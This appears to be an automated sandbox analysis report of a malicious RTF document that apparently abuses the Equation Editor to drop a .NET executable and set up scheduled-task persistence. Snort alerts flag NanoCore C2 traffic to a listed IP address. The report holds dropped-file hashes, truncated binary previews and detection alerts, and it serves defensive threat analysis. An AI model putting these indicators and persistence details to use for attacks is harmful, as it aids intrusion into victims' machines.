                                                      SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtixvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTmv
                                                      MD5:5BBD408E3FC2C0D9EB3F4633FBB0D305
                                                      SHA1:CC6CAC694FC188032DCA5D8543005FE555D0C475
                                                      SHA-256:D143874E6577C7C708B7A0C9353049D101B7EA462D53C0E8025D7E6812AEDEB1
                                                      SHA-512:ECE97D5D428C47BA3C7D728C480B5DA90EEECA457D0554E50F9D9A841F254658C5582FDBDE56D93B260FB2E081A535774761A7B9CE2155D1F2D26A9220BF35DF
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                      C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1310
                                                      Entropy (8bit):5.1063907901076036
                                                      Encrypted:false
                                                      SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
                                                      MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
                                                      SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
                                                      SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
                                                      SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                                                      C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1320
                                                      Entropy (8bit):5.135668813522653
                                                      Encrypted:false
                                                      SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mXxtn:cbk4oL600QydbQxIYODOLedq3ZXj
                                                      MD5:8CAD1B41587CED0F1E74396794F31D58
                                                      SHA1:11054BF74FCF5E8E412768035E4DAE43AA7B710F
                                                      SHA-256:3086D914F6B23268F8A12CB1A05516CD5465C2577E1D1E449F1B45C8E5E8F83C
                                                      SHA-512:99C2EF89029DE51A866DF932841684B7FC912DF21E10E2DD0D09E400203BBDC6CBA6319A31780B7BF8B286D2CEA8EA3FC7D084348BF2F002AB4F5A34218CCBEF
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                                                      C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):232
                                                      Entropy (8bit):7.024371743172393
                                                      Encrypted:false
                                                      SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                      MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                      SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                      SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                      SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                      Malicious:false
                                                      Preview:Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.

                                                      C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):8
                                                      Entropy (8bit):3.0
                                                      Encrypted:false
                                                      SSDEEP:3:omLt:o+
                                                      MD5:542D3B9B452EE0E3A8118D7F9AF5157A
                                                      SHA1:E54E209FD181D854CC911008A117F790449442B6
                                                      SHA-256:18FB4B31D80558259256294FDBC1F15609946DE54BBA333AE99A7840DB9A0FEE
                                                      SHA-512:C4009ED3121539FD5696B97F885DDA187AEC80369E6B8BC9799D78E668D8DD25BFADF639CC50BECBE1140E614FE6781CDCE2D89E8133E9CCA83DE11B134B1162
                                                      Malicious:true
                                                      Preview:..C....H

                                                      C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bin

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):40
                                                      Entropy (8bit):5.221928094887364
                                                      Encrypted:false
                                                      SSDEEP:3:9bzY6oRDMjmPl:RzWDMCd
                                                      MD5:AE0F5E6CE7122AF264EC533C6B15A27B
                                                      SHA1:1265A495C42EED76CC043D50C60C23297E76CCE1
                                                      SHA-256:73B0B92179C61C26589B47E9732CE418B07EDEE3860EE5A2A5FB06F3B8AA9B26
                                                      SHA-512:DD44C2D24D4E3A0F0B988AD3D04683B5CB128298043134649BBE33B2512CE0C9B1A8E7D893B9F66FBBCDD901E2B0646C4533FB6C0C8C4AFCB95A0EFB95D446F8
                                                      Malicious:false
                                                      Preview:9iH...}Z.4..f..... 8.j....|.&X..e.F.*.

                                                      C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):327432
                                                      Entropy (8bit):7.99938831605763
                                                      Encrypted:true
                                                      SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                                      MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                                      SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                                      SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                                      SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                                      Malicious:false
                                                      Preview:pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7

                                                      C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):57
                                                      Entropy (8bit):4.830795005765378
                                                      Encrypted:false
                                                      SSDEEP:3:oMty8WddSWA1KMNn:oMLW6WA1j
                                                      MD5:08E799E8E9B4FDA648F2500A40A11933
                                                      SHA1:AC76B5E20DED247803448A2F586731ED7D84B9F3
                                                      SHA-256:D46E34924067EB071D1F031C0BC015F4B711EDCE64D8AE00F24F29E73ECB71DB
                                                      SHA-512:5C5701A86156D573BE274E73615FD6236AC89630714863A4CB2639EEC8EC1BE746839EBF8A9AEBA0A9BE326AF6FA02D8F9BD7A93D3FFB139BADE945572DF5FE9
                                                      Malicious:false
                                                      Preview:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DOC_MDR0307_019.LNK

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Mon Jan 24 22:30:17 2022, length=445364, window=hide
                                                      Category:dropped
                                                      Size (bytes):1039
                                                      Entropy (8bit):4.545917285062086
                                                      Encrypted:false
                                                      SSDEEP:12:8TF4jKpRgXg/XAlCPCHaXeBhB/OW9qX+WgxGVQPWZmCicvbp8xZ0DtZ3YilMMEp3:8Tqj4n/XTuzLI3VQ+EJeKmDv3qKQd7Qy
                                                      MD5:85942D0874A1632AD3AC10A95A454183
                                                      SHA1:37871AEA65601BB8E771CF5264659A1E221DD249
                                                      SHA-256:3099E6796E60000F9D23BAA443B225CCFFE3BB9730AB8EF0C4B0F78229E59DEE
                                                      SHA-512:0ADBD50A41DEB54A9256531721B4011D1FFF9296E2E6C825C1F20CA63A8F627603E25F17B4878B2B4A993161B22A620BF1517320994F75DA0773A51F9AA893C5
                                                      Malicious:false
                                                      Preview:L..................F.... .....O?.....O?......Xz................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....8T. .DOC_MD~1.DOC..T.......S...S..*.........................D.O.C._.M.D.R.0.3.0.7._.0.1.9...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\DOC_MDR0307_019.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.O.C._.M.D.R.0.3.0.7._.0.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......783875..........D_....3N...W...9..g..........

                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):81
                                                      Entropy (8bit):4.805554558750854
                                                      Encrypted:false
                                                      SSDEEP:3:bDuMJl5d9lSp3omX18KlSp3ov:bCyQ3E73y
                                                      MD5:42F62869CC0695734C9F7A63B7D91AEC
                                                      SHA1:E974A93DEDBCA09C040C178A6E28608C358694FD
                                                      SHA-256:A32B8F0C13661B05FE0ACAF837E41434C95355C741C4C78C96203BB9539BA3B2
                                                      SHA-512:6926A5B5588A1E0232D0E975E1F362CEEEE44911ED054D29CAFE1B6C0E0420CFEFC4366C8E7E170468217E1E981880C8E421B0DC28460CD76596997DF10E0D39
                                                      Malicious:false
                                                      Preview:[folders]..Templates.LNK=0..DOC_MDR0307_019.LNK=0..[doc]..DOC_MDR0307_019.LNK=0..

                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.5038355507075254
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FIY27LSZ1R4X92P268IK.temp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.583360878315553
                                                      Encrypted:false
                                                      SSDEEP:96:chQCQMqKqvsqvJCwo4z8hQCQMqKqvsEHyqvJCworqzavKrdHXpxpyMGlUVWA2:cWzo4z8WnHnorqzaClf8MwA2
                                                      MD5:297F7633323831197F095937ECF093C0
                                                      SHA1:59372DBF5C1C2C53013EA4D2572B8316B8D1B29B
                                                      SHA-256:75ECF71F0A9B2B42E522DA399C7D4FD8335186697CFAC7EF7004A2C39DB49C4B
                                                      SHA-512:3D7574668AD564375BD251D773A8FAA7503BBB16CD7487EFDBB8DACAC0215680D2AD3EA8225BE016E6D01D9F025E8E86A639D1145AB57062AE65EDCACB203F8A
                                                      Malicious:false
                                                      Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.583360878315553
                                                      Encrypted:false
                                                      SSDEEP:96:chQCQMqKqvsqvJCwo4z8hQCQMqKqvsEHyqvJCworqzavKrdHXpxpyMGlUVWA2:cWzo4z8WnHnorqzaClf8MwA2
                                                      MD5:297F7633323831197F095937ECF093C0
                                                      SHA1:59372DBF5C1C2C53013EA4D2572B8316B8D1B29B
                                                      SHA-256:75ECF71F0A9B2B42E522DA399C7D4FD8335186697CFAC7EF7004A2C39DB49C4B
                                                      SHA-512:3D7574668AD564375BD251D773A8FAA7503BBB16CD7487EFDBB8DACAC0215680D2AD3EA8225BE016E6D01D9F025E8E86A639D1145AB57062AE65EDCACB203F8A
                                                      Malicious:false
                                                      Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                      C:\Users\user\AppData\Roaming\ZdNnwVcb.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\plugmancdht5461.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):473088
                                                      Entropy (8bit):7.83796766223819
                                                      Encrypted:false
                                                      SSDEEP:12288:d3jmSsNIXVfqxWnvkrWOzAG30uYs8VGriQ:dySsNFcGzkJV
                                                      MD5:7031570AA150B893F68A32900327B2AE
                                                      SHA1:CAEB6580B9D33EEDEA97C7775AD0853A33A59B3A
                                                      SHA-256:F515A9D2910DA428D7803AFC2244476A5B185F30361482CC1DD49670513281A5
                                                      SHA-512:CFA535B9A5931D41E2177447D6A255ACFB97BA4A0672A776CD6B741515DD9F473CD834A8E119BD096934B954590A2368EECF62A1953C77A5DF7B8AB8152A8773
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 40%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.a..............0..,...........J... ...`....@.. ....................................@.................................<J..O....`.. ............................................................................ ............... ..H............text....*... ...,.................. ..`.rsrc... ....`......................@..@.reloc...............6..............@..B................pJ......H.......`..........0...(...8............................................................................0..........*....0...........{....*..0............}....*.0..N........ =.G. ....a%..^E....'...............+%.{...... .*.Z ....a+.. ..T.Z ....a+..*...0..;........ TQs. c]i.a%..^E................+..{...... v._.Z w...a+..*..0.............}....*....0..;.........{..... .. .GJ.a%..^E................+.. x~..Z ...a+..*..0............}......}.....(!... ..$. .1.Wa%...^E....-......

                                                      C:\Users\user\AppData\Roaming\plugmancdht5461.exe

                                                      Download File
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):473088
                                                      Entropy (8bit):7.83796766223819
                                                      Encrypted:false
                                                      SSDEEP:12288:d3jmSsNIXVfqxWnvkrWOzAG30uYs8VGriQ:dySsNFcGzkJV
                                                      MD5:7031570AA150B893F68A32900327B2AE
                                                      SHA1:CAEB6580B9D33EEDEA97C7775AD0853A33A59B3A
                                                      SHA-256:F515A9D2910DA428D7803AFC2244476A5B185F30361482CC1DD49670513281A5
                                                      SHA-512:CFA535B9A5931D41E2177447D6A255ACFB97BA4A0672A776CD6B741515DD9F473CD834A8E119BD096934B954590A2368EECF62A1953C77A5DF7B8AB8152A8773
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 40%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.a..............0..,...........J... ...`....@.. ....................................@.................................<J..O....`.. ............................................................................ ............... ..H............text....*... ...,.................. ..`.rsrc... ....`......................@..@.reloc...............6..............@..B................pJ......H.......`..........0...(...8............................................................................0..........*....0...........{....*..0............}....*.0..N........ =.G. ....a%..^E....'...............+%.{...... .*.Z ....a+.. ..T.Z ....a+..*...0..;........ TQs. c]i.a%..^E................+..{...... v._.Z w...a+..*..0.............}....*....0..;.........{..... .. .GJ.a%..^E................+.. x~..Z ...a+..*..0............}......}.....(!... ..$. .1.Wa%...^E....-......

                                                      C:\Users\user\Desktop\~$C_MDR0307_019.doc

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.5038355507075254
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                      Static File Info

                                                      General

                                                      File type:Rich Text Format data, unknown version
                                                      Entropy (8bit):4.100978963404899
                                                      TrID:
                                                      • Rich Text Format (5005/1) 55.56%
                                                      • Rich Text Format (4004/1) 44.44%
                                                      File name:DOC_MDR0307_019.doc
                                                      File size:445364
                                                      MD5:0f99f373718685c0235b20df7624b00c
                                                      SHA1:1ed1e0a6b306bf8bee39628cfcfa2f8e683bec77
                                                      SHA256:adc82a58d8c890881cc7781be8e831b948dc06757664946ca302f2ef5200bd38
                                                      SHA512:62894abff24ee8fc5309cc4afad29fe43a919651f64b9a480a79a4f8baee8f05fc8da5beda1cf529e521486de854db0070b36c89d505c4fa6566136d4394a5c1
                                                      SSDEEP:12288:trN45zrtgVRUXpJLGE1tn2uwBC1voAUq0uOl63XmAf6/oq:L45zrtgVRUXnqy92wOq0plCXmAf6/7
                                                      File Content Preview:{\rtf92340@]'?/57_4.(@?9!3.=3$3?<%?60-'3+@3.5/>?(?(,=?53&!2.6$??!:`(=@2~=>+([|8>?.%<|2??><%+3:]+%?|_/)@.&:?04$<3)].<6?%&._?,.*@?:,:4%?1#?76:?^>?^%]>,?%`2]`27<~?|%?^%|.0>%!2^8^(!&6_#?`^/?5)5@*;7@`':::<.1[.~?,~;=:8~9`?#|$^?.%..!''>*???$28^69???3-(%^$.+]@.6_

                                                      File Icon

                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                      Static RTF Info

                                                      Objects

                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                      00000181Chno
                                                      1000017DChno

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      01/24/22-15:31:33.307731UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22
                                                      01/24/22-15:31:33.672663TCP2025019ET TROJAN Possible NanoCore C2 60B491663132192.168.2.22103.153.78.234
                                                      01/24/22-15:31:39.731274UDP254DNS SPOOF query response with TTL of 1 min. and no authority53578058.8.8.8192.168.2.22
                                                      01/24/22-15:31:39.958267TCP2025019ET TROJAN Possible NanoCore C2 60B491673132192.168.2.22103.153.78.234
                                                      01/24/22-15:31:45.875524UDP254DNS SPOOF query response with TTL of 1 min. and no authority53590308.8.8.8192.168.2.22
                                                      01/24/22-15:31:46.170779TCP2025019ET TROJAN Possible NanoCore C2 60B491683132192.168.2.22103.153.78.234
                                                      01/24/22-15:32:06.055263UDP254DNS SPOOF query response with TTL of 1 min. and no authority53591858.8.8.8192.168.2.22
                                                      01/24/22-15:32:06.283296TCP2025019ET TROJAN Possible NanoCore C2 60B491693132192.168.2.22103.153.78.234
                                                      01/24/22-15:32:12.561281TCP2025019ET TROJAN Possible NanoCore C2 60B491703132192.168.2.22103.153.78.234
                                                      01/24/22-15:32:18.755322TCP2025019ET TROJAN Possible NanoCore C2 60B491713132192.168.2.22103.153.78.234
                                                      01/24/22-15:32:40.087004TCP2025019ET TROJAN Possible NanoCore C2 60B491723132192.168.2.22103.153.78.234
                                                      01/24/22-15:32:45.788752UDP254DNS SPOOF query response with TTL of 1 min. and no authority53598678.8.8.8192.168.2.22
                                                      01/24/22-15:32:46.021979TCP2025019ET TROJAN Possible NanoCore C2 60B491733132192.168.2.22103.153.78.234
                                                      01/24/22-15:32:52.111741TCP2025019ET TROJAN Possible NanoCore C2 60B491743132192.168.2.22103.153.78.234
                                                      01/24/22-15:33:16.429569UDP254DNS SPOOF query response with TTL of 1 min. and no authority53500728.8.8.8192.168.2.22
                                                      01/24/22-15:33:16.666425TCP2025019ET TROJAN Possible NanoCore C2 60B491763132192.168.2.22103.153.78.234
                                                      01/24/22-15:33:22.506894UDP254DNS SPOOF query response with TTL of 1 min. and no authority53543048.8.8.8192.168.2.22
                                                      01/24/22-15:33:22.745018TCP2025019ET TROJAN Possible NanoCore C2 60B491773132192.168.2.22103.153.78.234
                                                      01/24/22-15:33:28.241252TCP2025019ET TROJAN Possible NanoCore C2 60B491783132192.168.2.22103.153.78.234

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 24, 2022 15:31:19.033679962 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.060758114 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.060911894 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.061299086 CET4916580192.168.2.222.58.149.41
                                                      Jan 24, 2022 15:31:19.087913036 CET80491652.58.149.41192.168.2.22
                                                      Jan 24, 2022 15:31:19.088403940 CET80491652.58.149.41192.168.2.22
